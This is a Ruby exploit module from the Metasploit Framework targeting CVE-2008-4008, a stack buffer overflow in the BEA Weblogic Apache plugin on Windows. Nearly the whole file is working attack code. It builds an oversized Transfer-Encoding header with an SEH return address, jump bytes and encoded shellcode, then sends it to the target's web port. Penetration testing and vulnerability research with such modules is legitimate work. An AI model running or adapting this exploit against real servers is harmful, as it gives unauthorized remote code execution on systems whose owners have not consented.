## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. This vulnerability exists in the error reporting for unknown Transfer-Encoding headers. You may have to run this twice due to timing issues with handlers. }, 'Author' => 'pusscat', 'References' => [ [ 'CVE', '2008-4008' ], [ 'OSVDB', '49283' ], [ 'URL', 'http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html'], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', }, 'Privileged' => true, 'Platform' => 'win', 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x0d\x0a", 'StackAdjustment' => -1500, }, 'Targets' => [ [ 'Windows Apache 2.2 version Universal', { 'Ret' => 0x1001f4d6, #pop/pop/ret } ], ], 'DisclosureDate' => 'Sept 09 2008', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80) ], self.class ) end def exploit sploit = Rex::Text.rand_text_alphanumeric(5800, payload_badchars) sploit[5781, 8] = "\xeb\x06MC" + [target.ret].pack('V') sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff" sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded request = "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: " + sploit + "\r\n\r\n" handler connect sock.put(request); disconnect end end